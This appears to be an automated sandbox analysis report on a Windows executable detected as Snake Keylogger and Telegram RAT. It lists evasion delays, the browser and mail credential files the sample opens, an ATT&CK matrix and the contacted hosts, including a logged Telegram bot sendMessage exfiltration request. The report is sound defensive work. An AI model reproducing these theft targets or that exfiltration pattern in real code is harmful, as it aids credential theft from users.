            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -594188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -594063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -593938s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -593813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -593688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -593578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -593469s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exe TID: 6604Thread sleep time: -593344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405974
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_004064C6 FindFirstFileW,FindClose,0_2_004064C6
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_00405974 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405974
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_004064C6 FindFirstFileW,FindClose,4_2_004064C6
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599782Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599422Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 598913Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 598688Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 598360Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 598229Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 598110Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597985Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597860Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597735Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597610Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597485Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597360Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597191Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 597063Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596938Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596813Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596688Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596579Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596454Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596329Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596204Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595824Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595477Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595355Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595247Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595117Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 595000Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594891Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594766Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594657Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594532Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594407Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594297Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594188Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 594063Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593938Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593813Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593688Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593578Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593469Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeThread delayed: delay time: 593344Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: JOSXXL1.exe, 00000004.00000002.2943116609.000000000701D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: JOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWxA
            Source: C:\Users\user\Desktop\JOSXXL1.exeAPI call chain: ExitProcess graph end nodegraph_0-4636
            Source: C:\Users\user\Desktop\JOSXXL1.exeAPI call chain: ExitProcess graph end nodegraph_0-4639
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeProcess created: C:\Users\user\Desktop\JOSXXL1.exe "C:\Users\user\Desktop\JOSXXL1.exe"Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeQueries volume information: C:\Users\user\Desktop\JOSXXL1.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeCode function: 0_2_004061A5 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_004061A5
            Source: C:\Users\user\Desktop\JOSXXL1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Users\user\Desktop\JOSXXL1.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: C:\Users\user\Desktop\JOSXXL1.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: Yara matchFile source: 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Snake Keylogger
            Source: Yara matchFile source: 00000004.00000002.2971397294.0000000037451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Yara detected Telegram RAT
            Source: Yara matchFile source: Process Memory Space: JOSXXL1.exe PID: 3492, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Access Token Manipulation            		1
            Masquerading            		1
            OS Credential Dumping            		21
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Web Service            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
            Process Injection            		1
            Disable or Modify Tools            		LSASS Memory31
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		31
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Application Window Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		3
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Access Token Manipulation            		NTDS1
            System Network Configuration Discovery            		Distributed Component Object Model1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Process Injection            		LSA Secrets3
            File and Directory Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Deobfuscate/Decode Files or Information            		Cached Domain Credentials215
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            JOSXXL1.exe58%ReversingLabsWin32.Spyware.Snakekeylogger

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
            http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://checkip.dyndns.org/0%URL Reputationsafe
            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://reallyfreegeoip.org0%URL Reputationsafe
            https://apis.google.com0%URL Reputationsafe
            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            https://reallyfreegeoip.org/xml/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            drive.google.com
            		142.250.185.238
            		truefalse
              		unknown
              drive.usercontent.google.com
              		142.250.181.225
              		truefalse
                		unknown
                reallyfreegeoip.org
                		188.114.96.3
                		truetrue
                  		unknown
                  api.telegram.org
                  		149.154.167.220
                  		truetrue
                    		unknown
                    checkip.dyndns.com
                    		193.122.130.0
                    		truefalse
                      		unknown
                      checkip.dyndns.org
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20and%20Time:%2027/10/2024%20/%2006:11:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20447849%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                          		unknown
                          https://reallyfreegeoip.org/xml/173.254.250.68false
                            		unknown
                            http://checkip.dyndns.org/false
                            • URL Reputation: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.office.com/JOSXXL1.exe, 00000004.00000002.2971397294.000000003763F000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://duckduckgo.com/chrome_newtabJOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              https://reallyfreegeoip.org/xml/173.254.250.68$JOSXXL1.exe, 00000004.00000002.2971397294.00000000374C5000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003750B000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmpfalse
                                		unknown
                                https://duckduckgo.com/ac/?q=JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://api.telegram.orgJOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://www.google.com/images/branding/product/ico/googleg_lodp.icoJOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://api.telegram.org/botJOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://microsoft.cojJOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://www.microsoft.coJOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://drive.usercontent.google.com/JOSXXL1.exe, 00000004.00000003.2471464803.0000000007070000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2943116609.000000000702F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016JOSXXL1.exe, 00000004.00000002.2972706874.0000000038573000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000386C9000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038525000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003859A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://nsis.sf.net/NSIS_ErrorErrorJOSXXL1.exe, 00000000.00000002.2317554373.000000000040A000.00000004.00000001.01000000.00000003.sdmp, JOSXXL1.exe, 00000000.00000000.1674444309.000000000040A000.00000008.00000001.01000000.00000003.sdmp, JOSXXL1.exe, 00000004.00000000.2315337300.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17JOSXXL1.exe, 00000004.00000002.2972706874.0000000038573000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000386C9000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038525000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003859A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=JOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://chrome.google.com/webstore?hl=enJOSXXL1.exe, 00000004.00000002.2971397294.000000003760E000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003763F000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.0000000037555000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.ecosia.org/newtab/JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://chrome.google.com/webstore?hl=enlBkqJOSXXL1.exe, 00000004.00000002.2971397294.0000000037609000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://ac.ecosia.org/autocomplete?q=JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://www.google.comJOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://drive.google.com/JOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallJOSXXL1.exe, 00000004.00000002.2972706874.00000000386CF000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038500000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000387A7000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038575000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003852B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchJOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://reallyfreegeoip.orgJOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2971397294.000000003749B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://apis.google.comJOSXXL1.exe, 00000004.00000003.2418443538.0000000007036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.office.com/lBkqJOSXXL1.exe, 00000004.00000002.2971397294.000000003763A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesJOSXXL1.exe, 00000004.00000002.2972706874.00000000386CF000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038500000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.00000000387A7000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.0000000038575000.00000004.00000800.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2972706874.000000003852B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:447849%0D%0ADate%20aJOSXXL1.exe, 00000004.00000002.2971397294.0000000037531000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://drive.usercontent.google.com/1JOSXXL1.exe, 00000004.00000003.2471629134.0000000007036000.00000004.00000020.00020000.00000000.sdmp, JOSXXL1.exe, 00000004.00000002.2943116609.000000000702F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=JOSXXL1.exe, 00000004.00000002.2972706874.0000000038717000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://drive.google.com/aJOSXXL1.exe, 00000004.00000002.2943116609.0000000006FC7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://reallyfreegeoip.org/xml/JOSXXL1.exe, 00000004.00000002.2971397294.000000003749B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              		unknown

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              149.154.167.220
                                                              		api.telegram.orgUnited Kingdom
                                                              		62041TELEGRAMRUtrue
                                                              142.250.181.225
                                                              		drive.usercontent.google.comUnited States
                                                              		15169GOOGLEUSfalse
                                                              188.114.96.3
                                                              		reallyfreegeoip.orgEuropean Union
                                                              		13335CLOUDFLARENETUStrue
                                                              193.122.130.0
                                                              		checkip.dyndns.comUnited States
                                                              		31898ORACLE-BMC-31898USfalse
                                                              142.250.185.238
                                                              		drive.google.comUnited States
                                                              		15169GOOGLEUSfalse

                                                              General Information

                                                              Joe Sandbox version:41.0.0 Charoite
                                                              Analysis ID:1542950
                                                              Start date and time:2024-10-26 23:55:05 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 7m 56s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:6
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
